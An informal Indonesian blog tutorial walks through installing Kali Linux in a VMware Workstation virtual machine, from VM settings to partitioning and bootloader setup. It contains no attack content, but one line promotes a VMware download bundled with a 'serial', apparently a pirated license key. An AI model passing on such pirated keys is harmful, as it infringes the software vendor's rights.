    Halo kawan,apakah kalian pernah nyobain backtrack? atau belum tau itu apa? Coba baca disini, :D hehe :P
    Oke langsung saja ke topik pembicaraan, untuk yang belum download OS kali linuxnya,monggo tembus dulu nih situs ini =>
    nah kalo udah di download, download lagi software yang satu ini, software ini untuk membuka OSnya, yaitu VMware, kalo gk pake ini takutnya ntar pas instalasi salah format, jadi kehapus tuh hardisknya :v
    Oke langsung Download aja nih Softwarenya Free Download VMware Workstation 9.0.1 + Serial Terbaru kalo udah,yok mari ke TKP :D
    Oh iya, mungkin postingan ini repost dari Postingan kang Meninbox :D ini postingannya => Forum SBH
    Langkah Langkahnya,Maaf Kalo Berantakan, SSnya pake text ama gui :3
    Untuk yang belum tau,saya share lagi.. :D

    1. Buka dulu VMware Workstationnya :D
    2. Pilih Typical (Disarankan) lalu Next aja
    3. Lalu Ikutin kaya gambar di bawah : 
    4. Pilih Linux aja dan bawahnya Biarkan ubuntu.. terus next aja
    5. Beri nama Kali Linux aja, terus next lagi..
    6. Biarkan saja 20 GB,next aja.. kalo udah Finish.. :D
    7. Otomatis akan memulai loading kali linuxnya.. :) Kalo Belum Liat Kaya gambar di bawah : 
    8. Nah sekarang tahap instalasi.. :D Pertama Pilih Install atau Graphical Install (Sama saja)
    9. Tunggu Hingga proses loading selesai.. 
    10. Isi Hostname Bebas/Terserah ,kalau sudah continue aja.. :D 
    11. Isi Root Password Terserah ,itu untuk login saat startup Kali linuxnya lalu continue kalau sudah :D 
    12. Tunggu loading Date/Time. 
    13. Pilih Sesuai daerah kamu.. :D 
    14. Saat masuk di menu ini,Pilih : "all files on one partition" terus Continue : 
    15. Pilih : "Finish partitioning and write changes to disk"
    16. Nah Di bagian ini Yes Aja terus continue.. 
    17. HTTP proxy kosongin aja. Continue 
    18. "Install the grub boot loader on hard disk" Pilih Yes Lagi :3 
    19. Tunggu sampai Instalasi Complete.. (Lumayan Lama Harap Bersabar) kalo udah complete ntar kaya gambar yang di bawah :D
       
    20. Jika sudah Continue saja,System akan restart dgn sendirinya..
    21. Saatnya login :3 
    22. Dah masuk.. :D 
    Semoga Bermanfaat tutorialnya kawan.. :D
    Maaf kalo tutornya masih acak acakan,maklum newbie belajar bikin tutor.. :)
     
    Source : http://rpl4rt.blogspot.com
  • Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo